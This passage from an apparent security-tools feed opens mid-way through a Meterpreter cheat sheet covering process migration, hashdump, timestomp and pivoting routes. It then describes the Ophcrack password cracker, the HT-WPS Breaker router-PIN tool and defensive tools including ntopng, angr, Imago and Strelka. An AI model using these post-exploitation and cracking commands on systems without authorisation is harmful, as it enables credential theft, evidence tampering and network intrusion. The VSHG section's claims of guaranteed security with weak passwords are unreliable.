migrate: Jump to a given destination process ID
  • Target process must have same or lesser privileges
  • Target process may be a more stable process
  • When inside a process, can access any files that process has a lock on.

Network Commands:
ipconfig: Show network interface information
portfwd: Forward packets through TCP session
route: Manage/view the system's routing table

Misc Commands:
idletime: Display the duration that the GUI of thetarget machine has been idle.
uictl [enable/disable] [keyboard/mouse]: Enable/disable either the mouse or keyboard of the target machine.
screenshot: Save as an image a screenshot of the target machine.

Additional Modules:
use [module]: Load the specified module
Example:
use priv: Load the priv module
hashdump: Dump the hashes from the box
timestomp:Alter NTFS file timestamps

Managing Sessions

Multiple Exploitation:
Run the exploit expecting a single session that is immediately backgrounded:
msf > exploit -z
Run the exploit in the background expecting one or more sessions that are immediately backgrounded:
msf > exploit –j

List all current jobs (usually exploit listeners):
msf > jobs –l

Kill a job:
msf > jobs –k [JobID]

Multiple Sessions:

List all backgrounded sessions:
msf > sessions -l

Interact with a backgrounded session:
msf > session -i [SessionID]

Background the current interactive session:
meterpreter > <Ctrl+Z>
or
meterpreter > background

Routing Through Sessions:
All modules (exploits/post/aux) against the target subnet mask will be pivoted through this session.
msf > route add [Subnet to Route To]
[Subnet Netmask] [SessionID]


Ophcrack - A Windows Password Cracker Based On Rainbow Tables

$
0
0

Ophcrack is a free Windows password cracker based on rainbow tables. It is a very efficient implementation of rainbow tables done by the inventors of the method. It comes with a Graphical User Interface and runs on multiple platforms.

Features:
  • Runs on Windows, Linux/Unix, Mac OS X, ...
  • Cracks LM and NTLM hashes.
  • Free tables available for Windows XP and Vista/7.
  • Brute-force module for simple passwords.
  • Audit mode and CSV export.
  • Real-time graphs to analyze the passwords.
  • LiveCD available to simplify the cracking.
  • Dumps and loads hashes from encrypted SAM recovered from a Windows partition.
  • Free and open source software (GPL).

HT-WPS Breaker - High Touch WPS Breaker

$
0
0

High Touch WPS Breaker [HT-WB] is a small tool based on the bash script language, it can help you to extract the WPS pin of many vulnerable routers and get the password, in the last you want to notice that HT-WPS Breaker in its process is using these tools :
  • "Piexiewps"
  • "Reaver"
  • "Bully"
  • "Aircrack Suite"
  • "Wash"

Preview






Video

Here is how to make the script works
  • Copy HT-WPS-Breaker.zip to Desktop .
  • Open The Terminal .
  • Type the following commands :
    • cd Desktop
    • unzip HT-WPS-Breaker.zip
    • cd HT-WPS-Breaker
    • chmod +x HT-WB.sh
    • ./HT-WB.sh or bash HT-WB.sh


Ntopng - Web-based Traffic And Security Network Traffic Monitoring

$
0
0

ntopng is the next generation version of the original ntop, a network traffic probe that monitors network usage. ntopng is based on libpcap and it has been written in a portable way in order to virtually run on every Unix platform, MacOSX and on Windows as well.
ntopng – yes, it’s all lowercase – provides a intuitive, encrypted web user interface for the exploration of realtime and historical traffic information.

Main Features
  • Sort network traffic according to many criteria including IP address, port, L7 protocol, throughput, Autonomous Systems (ASs)
  • Show realtime network traffic and active hosts
  • Produce long-term reports for several network metrics including throughput and application protocols
  • Top talkers (senders/receivers), top ASs, top L7 applications
  • Monitor and report live throughput, network and application latencies, Round Trip Time (RTT), TCP statistics (retransmissions, out of order packets, packet lost), and bytes and packets transmitted
  • Store on disk persistent traffic statistics to allow future explorations and post-mortem analyses
  • Geolocate and overlay hosts in a geographical map
  • Discover application protocols (Facebook, YouTube, BitTorrent, etc) by leveraging on nDPI, ntop Deep Packet Inspection (DPI) technology
  • Characterise HTTP traffic by leveraging on characterisation services provided by Google and HTTP Blacklist.
  • Analyse IP traffic and sort it according to the source/destination.
  • Report IP protocol usage sorted by protocol type
  • Produce HTML5/AJAX network traffic statistics.
  • Full support for IPv4 and IPv6
  • Full Layer-2 support (including ARP statistics)
  • GTP/GRE detunnelling
  • Support for MySQL, ElasticSearch and LogStash export of monitored data
  • Interactive historical exploration of monitored data exported to MySQL
  • Alerts engine to capture anomalous and suspicious hosts
  • SNMP v1/v2c support and continuous monitoring of SNMP devices

Angr - A Powerful And User-Friendly Binary Analysis Platform

$
0
0


angr is a platform-agnostic binary analysis framework. It is brought to you by the Computer Security Lab at UC Santa Barbara, SEFCOM at Arizona State University, their associated CTF team, Shellphish, the open source community, and @rhelmot.

What?
angr is a suite of Python 3 libraries that let you load a binary and do a lot of cool things to it:
  • Disassembly and intermediate-representation lifting
  • Program instrumentation
  • Symbolic execution
  • Control-flow analysis
  • Data-dependency analysis
  • Value-set analysis (VSA)
  • Decompilation
The most common angr operation is loading a binary: p = angr.Project('/bin/bash') If you do this in an enhanced REPL like IPython, you can use tab-autocomplete to browse the top-level-accessible methods and their docstrings.
The short version of "how to install angr" is mkvirtualenv --python=$(which python3) angr && python -m pip install angr.

Example
angr does a lot of binary analysis stuff. To get you started, here's a simple example of using symbolic execution to get a flag in a CTF challenge.
import angr

project = angr.Project("angr-doc/examples/defcamp_r100/r100", auto_load_libs=False)

@project.hook(0x400844)
def print_flag(state):
print("FLAG SHOULD BE:", state.posix.dumps(0))
project.terminate_execution()

project.execute()

Quick Start


VSHG - Hardware resistance & enhanced security for GnuPG

$
0
0

VSHG aims to provide a memory / hardware resistant reinforcement to GnuPG's standared s2k key-derivation-function + a simplified interface for symmetricencryption .

About VSHG
VSHG ( Very secure hash generator ) is a standalone Addon for GnuPG ( Gnu privacy guard ) . It is written as a shell script and is designed around the Unix/Linux filesystem and commands. VSHG uses the sha384 and the Argon2 hash function for the password and AES-256-CFB + CAST5-128-CFB in cascade for the final encryption.
And also a standard sha384 iteration count of 800 iterations + 15& 500 iterations for Argon2i + d
It uses True random 12 byte salts . So even if your passphrase is very weak , it will reinforce it so that you don't have to worry about that anymore.
VSHG uses the last hash of the Iteration as session key for Gnupg. It also provides an Autodetection function for each file so that you don't have to remember either the salt or the iteration count.
Optionally you can use a key-file as authentication method.

Why is VSHG so secure ?
VSHG uses a true random salt for each encrypted file, so your Passphrase will always have a minimum of 12 bytes in strength. You could even use the same password twice for different files. The thing that makes VSHG so secure are the iterations. 800 iterations mean the output of the string is hashed 800x with its output. The more iterations the more security there will be. Even if you have the correct passphrase, but not the correct amount of iterations it will not be able to decrypt.
VSHG uses some of the most advanced forms of memory hard Key derivation functions which are Argon2i and Argon2d. The already iterated key will be passed through Argon2 a total of 515 times and therefore ensure the resistance against the biggest threats of Key derivation functions Namely: Graphical Processing Units, Field programmable gate arrays and Application specific integrated circuits ( GPU , FPEGA , ASIC ) .
The actual encryption is performed with the highest level of security possible in Gnupg.
-The string to key ( s2k ) hash algo ( which is the KDF of Gnupg ) was reinforced from sha1 to sha512.
-The s2k mode was set to 3 which means that an 8-bit salt is applied and then iterated.
-The s2k count was set to 65011712 which is the highest possible number of iterations.
-The s2k algo was set to AES256 and CAST5 in cascade.
The AES 256 encrypted file is securely deleted so that only the AES256(Cast5()) encrypted file is put out.

Why should I use VSHG ?
  • It is easier to use than GnuPG core.
  • Can encrypt folders by turning them into Zip files.
  • Someone that doesn´t have VSHG does not really have a chance of cracking the password.
  • True random 12 byte salt
  • choosable Iteration count.
  • choosable Salt.
  • choosable Keyfile.
  • True random Keyfile.
  • Very good resistance to side channel attacks ( e.g: timing attacks ).
  • Very resistant towards GPU based attacks
  • Can guarantee security even with relatively weak passwords ( > 5 characters ) ( if you have enough Iterations )
  • Autodetection of Salt + Iteration count for each file.
  • Military standard AES-256 encryption + the gpg standard CAST5 encryption.
  • Uses the gpg s2k mode 3 + sha512 with the maximum count of 65011712.
  • Erases Original file securely.

Download & Installation
  • Download as tarball
sudo wget https://github.com/RichardRMatthews/VSHG/archive/1.4.tar.gz
Or clone the repository
git clone https://github.com/RichardRMatthews/VSHG.git
  • Compile it yourself
sudo git clone https://github.com/neurobin/shc.git
cd shc
sudo ./shc -f -r /etc/VSHG/executable/src/VSHG_1.4.sh
sudo gcc /etc/VSHG/executable/src/VSHG_1.4.sh.x.c -O /usr/bin/VSHG
sudo VSHG
  • Run
sudo tar -xf VSHG-1.4.tar.gz
sudo chmod +x VSHG_1.4.sh
sudo ./VSHG_1.4.sh


Imago Forensics - Imago Is A Python Tool That Extract Digital Evidences From Images

$
0
0

Imago is a python tool that extract digital evidences from images recursively. This tool is useful throughout a digital forensic investigation. If you need to extract digital evidences and you have a lot of images, through this tool you will be able to compare them easily. Imago allows to extract the evidences into a CSV file or in a sqlite database. If in a JPEG exif are present GPS coordinates, Imago can extract the longitude and latitude and it can convert them to degrees and to retrieve relevant information like city, nation, zip code... Imago offers also the possibility to calculate Error Level Analysis, and to detect nudity these functionalities are in BETA.

Setup

Setup via pip
  1. Install imago:
$ pip install imago
  1. Once installed, one new binary should be available: :
$ imago 
And then it should output the imago's banner

Requirements:
python 2.7
exifread 2.1.2
python-magic 0.4.15
argparse 1.4.0
pillow 5.2.0
nudepy 0.4
imagehash 4.0
geopy 1.16.0

Usage
usage: imago.py [-h] -i INPUT [-x] [-g] [-e] [-n] [-d {md5,sha256,sha512,all}]
[-p {ahash,phash,dhash,whash,all}] [-o OUTPUT] [-s]
[-t {jpeg,tiff}]

optional arguments:
-h, --help show this help message and exit
-i INPUT, --input INPUT
Input directory path
-x, --exif Extract exif metadata
-g, --gps Extract, parse and convert to coordinates, GPS exif
metadata from images (if any)It works only with JPEG.
-e, --ela Extract, Error Level Analysis image,It works only with
JPEG. *BETA*
-n, --nude Detect Nudity, It works only with JPEG, *BETA*
-d {md5,sha256,sha512,all}, --digest {md5,sha256,sha512,all}
Calculate perceptual image hashing
-p {ahash,phash,dhash,whash,all}, --percentualhash {ahash,phash,dhash,whash,all}
Calculate hash digest
-o OUTPUT, --output OUTPUT
Output directory path
-s, --sqli Keep SQLite file after the computation
-t {jpeg,tiff}, --type {jpeg,tiff}
Select the image, this flag can be JPEG or TIFF, if
this argument it is not provided, imago will process
all the image types(i.e. JPEG, TIFF)


The only required argument is -i which is the base directory from which imago will start to search for image file. You should also provide at least one type of extraction (i.e. exif, data, gps, digest).

Example:
$ imago -i /home/solvent/cases/c23/DCIM/ -o /home/solvent/cases/c23/ -x -s -t jpeg -d all
Where:
  • -i path: is the base directory, where imago will search for file
  • -o path: the output directory where imago will save the CSV file, with the extracted metadata
  • -x : imago will extract EXIF metadata.
  • -s: the temporary SQLite database will not be deleted after the processing.
  • -t jpeg: imago will search only for jpeg images.
  • -d all: imago will calculate md5, sha256, sha512 for the jpeg images.

Features:
FunctionalityStatus
Recursive directory navigation
file mtime (UTC)
file ctime (UTC)
file atime (UTC)
file size (bytes)
MIME type
Exif support
CSV export
Sqlite export
md5, sha256, sha512
Error Level Analysis✔ BETA
Full GPS support
Nudity detection✔ BETA
Perceptual Image Hashing
aHash
pHash
dHash
wHash





Strelka - Scanning Files At Scale With Python And ZeroMQ

$
0
0

Strelka is a real-time file scanning system used for threat hunting, threat detection, and incident response. Based on the design established by Lockheed Martin's Laika BOSS and similar projects (see: related projects), Strelka's purpose is to perform file extraction and metadata collection at huge scale.
Strelka differs from its sibling projects in a few significant ways:
  • Codebase is Python 3 (minimum supported version is 3.6)
  • Designed for non-interactive, distributed systems (network security monitoring sensors, live response scripts, disk/memory extraction, etc.)
  • Supports direct and remote file requests (Amazon S3, Google Cloud Storage, etc.) with optional encryption and authentication
  • Uses widely supported networking, messaging, and data libraries/formats (ZeroMQ, protocol buffers, YAML, JSON)
  • Built-in scan result logging and log management (compatible with Filebeat/ElasticStack, Splunk, etc.)

Frequently Asked Questions

"Who is Strelka?"
Strelka is one of the second generation Soviet space dogs to achieve orbital spaceflight -- the name is an homage to Lockheed Martin's Laika BOSS, one of the first public projects of this type and from which Strelka's core design is based.

"Why would I want a file scanning system?"
File metadata is an additional pillar of data (alongside network, endpoint, authentication, and cloud) that is effective in enabling threat hunting, threat detection, and incident response and can help event analysts and incident responders bridge visibility gaps in their environment. This type of system is especially useful for identifying threat actors during KC3 and KC7. For examples of what Strelka can do, please read the use cases.

"Should I switch from my current file scanning system to Strelka?"
It depends -- we recommend reviewing the features of each and choosing the most appropriate tool for your needs. We believe the most significant motivating factors for switching to Strelka are:

"Are Strelka's scanners compatible with Laika BOSS, File Scanning Framework, or Assemblyline?"
Due to differences in design, Strelka's scanners are not directly compatible with Laika BOSS, File Scanning Framework, or Assemblyline. With some effort, most scanners can likely be ported to the other projects.

"Is Strelka an intrusion detection system (IDS)?"
Strelka shouldn't be thought of as an IDS, but it can be used for threat detection through YARA rule matching and downstream metadata interpretation. Strelka's design follows the philosophy established by other popular metadata collection systems (Bro, Sysmon, Volatility, etc.): it extracts data and leaves the decision-making up to the user.

"Does it work at scale?"
Everyone has their own definition of "at scale," but we have been using Strelka and systems like it to scan up to 100 million files each day for over a year and have never reached a point where the system could not scale to our needs -- as file volume and diversity increases, horizontally scaling the system should allow you to scan any number of files.

"Doesn't this use a lot of bandwidth?"
Yep! Strelka isn't designed to operate in limited bandwidth environments, but we have experimented with solutions to this and there are tricks you can use to reduce bandwidth. These are what we've found most successful:
  • Reduce the total volume of files sent to Strelka
  • Use a tracking system to only send unique files to Strelka (networked Redis servers are especially useful for this)
  • Use traffic control (tc) to shape connections to Strelka

"Should I run my Strelka cluster on my Bro/Suricata network sensor?"
No! Strelka clusters run CPU-intensive processes that will negatively impact system-critical applications like Bro and Suricata. If you want to integrate a network sensor with Strelka, then use strelka_dirstream.py. This utility is capable of sending millions of files per day from a single network sensor to a Strelka cluster without impacting system-critical applications.

"I have other questions!"
Please file an issue or contact the project team at TTS-CFC-OpenSource@target.com. The project lead can also be reached on Twitter at @jshlbrd.

Installation
The recommended operating system for Strelka is Ubuntu 18.04 LTS (Bionic Beaver) -- it may work with earlier versions of Ubuntu if the appropriate packages are installed. We recommend using the Docker container for production deployments and welcome pull requests that add instructions for installing on other operating systems.

Ubuntu 18.04 LTS
  1. Update packages and install build packages
apt-get update && apt-get install --no-install-recommends automake build-essential curl gcc git libtool make python3-dev python3-pip python3-wheel
  1. Install runtime packages
apt-get install --no-install-recommends antiword libarchive-dev libfuzzy-dev libimage-exiftool-perl libmagic-dev libssl-dev python3-setuptools tesseract-ocr unrar upx jq
  1. Install pip3 packages
    pip3 install beautifulsoup4 boltons boto3 gevent google-cloud-storage html5lib inflection interruptingcow jsbeautifier libarchive-c lxml git+https://github.com/aaronst/macholibre.git olefile oletools pdfminer.six pefile pgpdump3 protobuf pyelftools pygments pyjsparser pylzma git+https://github.com/jshlbrd/pyopenssl.git python-docx git+https://github.com/jshlbrd/python-entropy.git python-keystoneclient python-magic python-swiftclient pyyaml pyzmq rarfile requests rpmfile schedule ssdeep tnefparse
  2. Install YARA
curl -OL https://github.com/VirusTotal/yara/archive/v3.8.1.tar.gz
tar -zxvf v3.8.1.tar.gz
cd yara-3.8.1/
./bootstrap.sh
./configure --with-crypto --enable-dotnet --enable-magic
make && make install && make check
echo "/usr/local/lib" >> /etc/ld.so.conf
ldconfig
  1. Install yara-python
curl -OL https://github.com/VirusTotal/yara-python/archive/v3.8.1.tar.gz  
tar -zxvf v3.8.1.tar.gz
cd yara-python-3.8.1/
python3 setup.py build --dynamic-linking
python3 setup.py install
  1. Create Strelka directories
    mkdir /var/log/strelka/ && mkdir /opt/strelka/
  2. Clone this repository
    git clone https://github.com/target/strelka.git /opt/strelka/
  3. Compile the Strelka protobuf
    cd /opt/strelka/server/ && protoc --python_out=. strelka.proto
  4. (Optional) Install the Strelka utilities
    cd /opt/strelka/ && python3 setup.py -q build && python3 setup.py -q install && python3 setup.py -q clean --all

Docker
  1. Clone this repository
    git clone https://github.com/target/strelka.git /opt/strelka/
  2. Build the container
    cd /opt/strelka/ && docker build -t strelka .

Quickstart
By default, Strelka is configured to use a minimal "quickstart" deployment that allows users to test the system. This configuration is not recommended for production deployments. Using two Terminal windows, do the following:
Terminal 1
$ strelka.py
Terminal 2:
$ strelka_user_client.py --broker 127.0.0.1:5558 --path <path to the file to scan>
$ cat /var/log/strelka/*.log | jq .
Terminal 1 runs a Strelka cluster (broker, 4 workers, and log rotation) with debug logging and Terminal 2 is used to send file requests to the cluster and read the scan results.

Deployment

Utilities
Strelka's design as a distributed system creates the need for client-side and server-side utilities. Client-side utilities provide methods for sending file requests to a cluster and server-side utilities provide methods for distributing and scanning files sent to a cluster.

strelka.py
strelka.py is a non-interactive, server-side utility that contains everything needed for running a large-scale, distributed Strelka cluster. This includes:
  • Capability to run servers in any combination of broker/workers
    • Broker distributes file tasks to workers
    • Workers perform file analysis on tasks
  • On-disk scan result logging
    • Configurable log rotation and management
    • Compatible with external log shippers (e.g. Filebeat, Splunk Universal Forwarder, etc.)
  • Supports encryption and authentication for connections between clients and brokers
  • Self-healing child processes (brokers, workers, log management)
This utility is managed with two configuration files: etc/strelka/strelka.yml and etc/strelka/pylogging.ini.
The help page for strelka.py is shown below:
usage: strelka.py [options]

runs Strelka as a distributed cluster.

optional arguments:
-h, --help show this help message and exit
-d, --debug enable debug messages to the console
-c STRELKA_CFG, --strelka-config STRELKA_CFG
path to strelka configuration file
-l LOGGING_INI, --logging-ini LOGGING_INI
path to python logging configuration file

strelka_dirstream.py
strelka_dirstream.py is a non-interactive, client-side utility used for sending files from a directory to a Strelka cluster in near real-time. This utility uses inotify to watch the directory and sends files to the cluster as soon as possible after they are written.
Additionally, for select file sources, this utility can parse metadata embedded in the file's filename and send it to the cluster as external metadata. Bro network sensors are currently the only supported file source, but other application-specific sources can be added.
Using the utility with Bro requires no modification of the Bro source code, but it does require the network sensor to run a Bro script that enables file extraction. We recommend using our stub Bro script (etc/bro/extract-strelka.bro) to extract files. Other extraction scripts will also work, but they will not parse Bro's metadata.
This utility is managed with one configuration file: etc/dirstream/dirstream.yml.
The help page for strelka_dirstream.py is shown below:
usage: strelka_dirstream.py [options]

sends files from a directory to a Strelka cluster in near real-time.

optional arguments:
-h, --help show this help message and exit
-d, --debug enable debug messages to the console
-c DIRSTREAM_CFG, --dirstream-config DIRSTREAM_CFG
path to dirstream configuration file

strelka_user_client.py
strelka_user_client.py is a user-driven, client-side utility that is used for sending ad-hoc file requests to a cluster. This client should be used when file analysis is needed for a specific file or group of files -- it is explicitly designed for users and should not be expected to perform long-lived or fully automated file requests. We recommend using this utility as an example of what is required in building new client utilities.
Using this utility, users can send three types of file requests:
The help page for strelka_user_client.py is shown below:
usage: strelka_user_client.py [options]

sends ad-hoc file requests to a Strelka cluster.

optional arguments:
-h, --help show this help message and exit
-d, --debug enable debug messages to the console
-b BROKER, --broker BROKER
network address and network port of the broker (e.g.
127.0.0.1:5558)
-p PATH, --path PATH path to the file or directory of files to send to the
broker
-l LOCATION, --location LOCATION
JSON representation of a location for the cluster to
retrieve files from
-t TIMEOUT, --timeout TIMEOUT
amount of time (in seconds) to wait until a file
transfer times out
-bpk BROKER_PUBLIC_KEY, --broker-public-key BROKER_PUBLIC_KEY
location of the broker Curve public key certificate
(this option enables curve encryption and must be used
if the broker has curve enabled)
-csk CLIENT_SECRET_KEY, --client-secret-key CLIENT_SECRET_KEY
location of the client Curve secret key certificate
(this option enables curve encryption and must be used
if the broker has curve enabled)
-ug, --use-green determines if PyZMQ green should be used, which can
increase performance at the risk of message loss

generate_curve_certificates.py
generate_curve_certificates.py is a utility used for generating broker and worker Curve certificates. This utility is required for setting up Curve encryption/authentication.
The help page for generate_curve_certificates.py is shown below:
usage: generate_curve_certificates.py [options]

generates curve certificates used by brokers and clients.

optional arguments:
-h, --help show this help message and exit
-p PATH, --path PATH path to store keys in (defaults to current working
directory)
-b, --broker generate curve certificates for a broker
-c, --client generate curve certificates for a client
-cf CLIENT_FILE, --client-file CLIENT_FILE
path to a file containing line-separated list of
clients to generate keys for, useful for creating many
client keys at once

validate_yara.py
validate_yara.py is a utility used for recursively validating a directory of YARA rules files. This can be useful when debugging issues related to the ScanYara scanner.
The help page for validate_yara.py is shown below:
usage: validate_yara.py [options]

validates YARA rules files.

optional arguments:
-h, --help show this help message and exit
-p PATH, --path PATH path to directory containing YARA rules
-e, --error boolean that determines if warnings should cause
errors

Configuration Files
Strelka uses YAML for configuring client-side and server-side utilities. We recommend using the default configurations and modifying the options as needed.

Strelka Configuration (strelka.py)
Strelka's cluster configuration file is stored in etc/strelka/strelka.yml and contains three sections: daemon, remote, and scan.

Daemon Configuration
The daemon configuration contains five sub-sections: processes, network, broker, workers, and logrotate.
The "processes" section controls the processes launched by the daemon. The configuration options are:
  • "run_broker": boolean that determines if the server should run a Strelka broker process (defaults to True)
  • "run_workers": boolean that determines if the server should run Strelka worker processes (defaults to True)
  • "run_logrotate": boolean that determines if the server should run a Strelka log rotation process (defaults to True)
  • "worker_count": number of workers to spawn (defaults to 4)
  • "shutdown_timeout": amount of time (in seconds) that will elapse before the daemon forcibly kills child processes after they have received a shutdown command (defaults to 45 seconds)
The "network" section controls network connectivity. The configuration options are:
  • "broker": network address of the broker (defaults to 127.0.0.1)
  • "request_socket_port": network port used by clients to send file requests to the broker (defaults to 5558)
  • "task_socket_port": network port used by workers to receive tasks from the broker (defaults to 5559)
The "broker" section controls settings related to the broker process. The configuration options are:
  • "poller_timeout": amount of time (in milliseconds) that the broker polls for client requests and worker statuses (defaults to 1000 milliseconds)
  • "broker_secret_key": location of the broker Curve secret key certificate (enables Curve encryption, requires clients to use Curve, defaults to None)
  • "client_public_keys": location of the directory containing client Curve public key certificates (enables Curve encryption and authentication, requires clients to use Curve, defaults to None)
  • "prune_frequency": frequency (in seconds) at which the broker prunes dead workers (defaults to 5 seconds)
  • "prune_delta": delta (in seconds) that must pass since a worker last checked in with the broker before it is considered dead and is pruned (defaults to 10 seconds)
The "workers" section controls settings related to worker processes. The configuration options are:
  • "task_socket_reconnect": amount of time (in milliseconds) that the task socket will attempt to reconnect in the event of TCP disconnection, this will have additional jitter applied (defaults to 100ms plus jitter)
  • "task_socket_reconnect_max": maximum amount of time (in milliseconds) that the task socket will attempt to reconnect in the event of TCP disconnection, this will have additional jitter applied (defaults to 4000ms plus jitter)
  • "poller_timeout": amount of time (in milliseconds) that workers poll for file tasks (defaults to 1000 milliseconds)
  • "file_max": number of files a worker will process before shutting down (defaults to 10000)
  • "time_to_live": amount of time (in minutes) that a worker will run before shutting down (defaults to 30 minutes)
  • "heartbeat_frequency": frequency (in seconds) at which a worker sends a heartbeat to the broker if it has not received any file tasks (defaults to 10 seconds)
  • "log_directory": location where worker scan results are logged to (defaults to /var/log/strelka/)
  • "log_field_case": field case ("camel" or "snake") of the scan result log file data (defaults to camel)
  • "log_bundle_events": boolean that determines if scan results should be bundled in single event as an array or in multiple events (defaults to True)
The "logrotate" section controls settings related to the log rotation process. The configuration options are:
  • "directory": directory to run log rotation on (defaults to /var/log/strelka/)
  • "compression_delta": delta (in minutes) that must pass since a log file was last modified before it is compressed (defaults to 15 minutes)
  • "deletion_delta": delta (in minutes) that must pass since a compressed log file was last modified before it is deleted (defaults to 360 minutes / 6 hours)

Remote Configuration
The remote configuration contains one sub-section: remote.
The "remote" section controls how workers retrieve files from remote file stores. Google Cloud Storage, Amazon S3, OpenStack Swift, and HTTP file stores are supported. All options in this configuration file are optionally read from environment variables if they are "null". The configuration options are:
  • "remote_timeout": amount of time (in seconds) to wait before timing out individual file retrieval
  • "remote_retries": number of times individual file retrieval will be re-attempted in the event of a timeout
  • "google_application_credentials": path to the Google Cloud Storage JSON credentials file
  • "aws_access_key_id": AWS access key ID
  • "aws_secret_access_key": AWS secret access key
  • "aws_default_region": default AWS region
  • "st_auth_version": OpenStack authentication version (defaults to 3)
  • "os_auth_url": OpenStack Keystone authentication URL
  • "os_username": OpenStack username
  • "os_password": OpenStack password
  • "os_cert": OpenStack Keystone certificate
  • "os_cacert": OpenStack Keystone CA Certificate
  • "os_user_domain_name": OpenStack user domain
  • "os_project_name": OpenStack project name
  • "os_project_domain_name": OpenStack project domain
  • "http_basic_user": HTTP Basic authentication username
  • "http_basic_pass": HTTP Basic authentication password
  • "http_verify": path to the CA bundle (file or directory) used for SSL verification (defaults to False, no verification)

Scan Configuration
The scan configuration contains two sub-sections: distribution and scanners.
The "distribution" section controls how files are distributed through the system. The configuration options are:
  • "close_timeout": amount of time (in seconds) that a scanner can spend closing itself (defaults to 30 seconds)
  • "distribution_timeout": amount of time (in seconds) that a single file can be distributed to all scanners (defaults to 1800 seconds / 30 minutes)
  • "scanner_timeout": amount of time (in seconds) that a scanner can spend scanning a file (defaults to 600 seconds / 10 minutes, can be overridden per-scanner)
  • "maximum_depth": maximum depth that child files will be processed by scanners
  • "taste_mime_db": location of the MIME database used to taste files (defaults to None, system default)
  • "taste_yara_rules": location of the directory of YARA files that contains rules used to taste files (defaults to etc/strelka/taste/)
The "scanners" section controls which scanners are assigned to each file; each scanner is assigned by mapping flavors, filenames, and sources from this configuration to the file. "scanners" must always be a dictionary where the key is the scanner name (e.g. ScanZip) and the value is a list of dictionaries containing values for mappings, scanner priority, and scanner options.
Assignment occurs through a system of positive and negative matches: any negative match causes the scanner to skip assignment and at least one positive match causes the scanner to be assigned. A unique identifier (*) is used to assign scanners to all flavors. See File Distribution, Scanners, Flavors, and Tasting for more details on flavors.
Below is a sample configuration that runs the scanner "ScanHeader" on all files and the scanner "ScanRar" on files that match a YARA rule named "rar_file".
scanners:
'ScanHeader':
- positive:
flavors:
- '*'
priority: 5
options:
length: 50
'ScanRar':
- positive:
flavors:
- 'rar_file'
priority: 5
options:
limit: 1000
The "positive" dictionary determines which flavors, filenames, and sources cause the scanner to be assigned. Flavors is a list of literal strings while filenames and sources are regular expressions. One positive match will assign the scanner to the file.
Below is a sample configuration that shows how RAR files can be matched against a YARA rule (rar_file), a MIME type (application/x-rar), and a filename (any that end with .rar).
scanners:
'ScanRar':
- positive:
flavors:
- 'application/x-rar'
- 'rar_file'
filename: '\.rar$'
priority: 5
options:
limit: 1000
Each scanner also supports negative matching through the "negative" dictionary. Negative matches occur before positive matches, so any negative match guarantees that the scanner will not be assigned. Similar to positive matches, negative matches support flavors, filenames, and sources.
Below is a sample configuration that shows how RAR files can be positively matched against a YARA rule (rar_file) and a MIME type (application/x-rar), but only if they are not negatively matched against a filename (\.rar$). This configuration would cause ScanRar to only be assigned to RAR files that do not have the extension ".rar".
scanners:
'ScanRar':
- negative:
filename: '\.rar$'
positive:
flavors:
- 'application/x-rar'
- 'rar_file'
priority: 5
options:
limit: 1000
Each scanner supports multiple mappings -- this makes it possible to assign different priorities and options to the scanner based on the mapping variables. If a scanner has multiple mappings that match a file, then the first mapping wins.
Below is a sample configuration that shows how a single scanner can apply different options depending on the mapping.
scanners:
'ScanX509':
- positive:
flavors:
- 'x509_der_file'
priority: 5
options:
type: 'der'
- positive:
flavors:
- 'x509_pem_file'
priority: 5
options:
type: 'pem'

Python Logging Configuration (strelka.py)
strelka.py uses an ini file (etc/strelka/pylogging.ini) to manage cluster-level statistics and information output by the Python logger. By default, this configuration file will log data to stdout and disable logging for packages imported by scanners.

DirStream Configuration (strelka_dirstream.py)
Strelka's dirstream configuration file is stored in etc/dirstream/dirstream.yml and contains two sub-sections: processes and workers.
The "processes" section controls the processes launched by the utility. The configuration options are:
  • "shutdown_timeout": amount of time (in seconds) that will elapse before the utility forcibly kills child processes after they have received a shutdown command (defaults to 10 seconds)
The "workers" section controls directory settings and network settings for each worker that sends files to the Strelka cluster. This section is a list; adding multiple directory/network settings makes it so multiple directories can be monitored at once. The configuration options are:
  • "directory": directory that files are sent from (defaults to None)
  • "source": application that writes files to the directory, used to control metadata parsing functionality (defaults to None)
  • "meta_separator": unique string used to separate pieces of metadata in a filename, used to parse metadata and send it along with the file to the cluster (defaults to "S^E^P")
  • "file_mtime_delta": delta (in seconds) that must pass since a file was last modified before it is sent to the cluster (defaults to 5 seconds)
  • "delete_files": boolean that determines if files should be deleted after they are sent to the cluster (defaults to False)
  • "broker": network address and network port of the broker (defaults to "127.0.0.1:5558")
  • "timeout": amount of time (in seconds) to wait for a file to be successfully sent to the broker (defaults to 10)
  • "use_green": boolean that determines if PyZMQ green should be used (this can increase performance at the risk of message loss, defaults to True)
  • "broker_public_key": location of the broker Curve public key certificate (enables Curve encryption, must be used if the broker has Curve enabled)
  • "client_secret_key": location of the client Curve secret key certificate (enables Curve encryption, must be used if the broker has Curve enabled)
To enable Bro support, a Bro file extraction script must be run by the Bro application; Strelka's file extraction script is stored in etc/bro/extract-strelka.bro and includes variables that can be redefined at Bro runtime. These variables are:
  • "mime_table": table of strings (Bro source) mapped to a set of strings (Bro mime_type) -- this variable defines which file MIME types Bro extracts and is configurable based on the location Bro identified the file (e.g. extract application/x-dosexec files from SMTP, but not SMB or FTP)
  • "filename_re": regex pattern that can extract files based on Bro filename
  • "unknown_mime_source": set of strings (Bro source) that determines if files of an unknown MIME type should be extracted based on the location Bro identified the file (e.g. extract unknown files from SMTP, but not SMB or FTP)
  • "meta_separator": string used in extracted filenames to separate embedded Bro metadata -- this must match the equivalent value in etc/dirstream/dirstream.yml
  • "directory_count_interval": interval used to schedule how often the script checks the file count in the extraction directory
  • "directory_count_threshold": int that is used as a trigger to temporarily disable file extraction if the file count in the extraction directory reaches the threshold

Encryption and Authentication
Strelka has built-in, optional encryption and authentication for client connections provided by CurveZMQ.

CurveZMQ
CurveZMQ (Curve) is ZMQ's encryption and authentication protocol. Read more about it here.

Using Curve
Strelka uses Curve to encrypt and authenticate connections between clients and brokers. By default, Strelka's Curve support is setup to enable encryption but not authentication.
To enable Curve encryption, the broker must be loaded with a private key -- any clients connecting to the broker must have the broker's public key to successfully connect.
To enable Curve encryption and authentication, the broker must be loaded with a private key and a directory of client public keys -- any clients connecting to the broker must have the broker's public key and have their client key loaded on the broker to successfully connect.
The generate_curve_certificates.py utility can be used to create client and broker certificates.

Clusters
The following are recommendations and considerations to keep in mind when deploying clusters.

General Recommendations
The following recommendations apply to all clusters:
  • Do not run workers on the same server as a broker
    • This puts the health of the entire cluster at risk if the server becomes over-utilized
  • Do not over-allocate workers to CPUs
    • 1 worker per CPU
  • Allocate at least 1GB RAM per worker
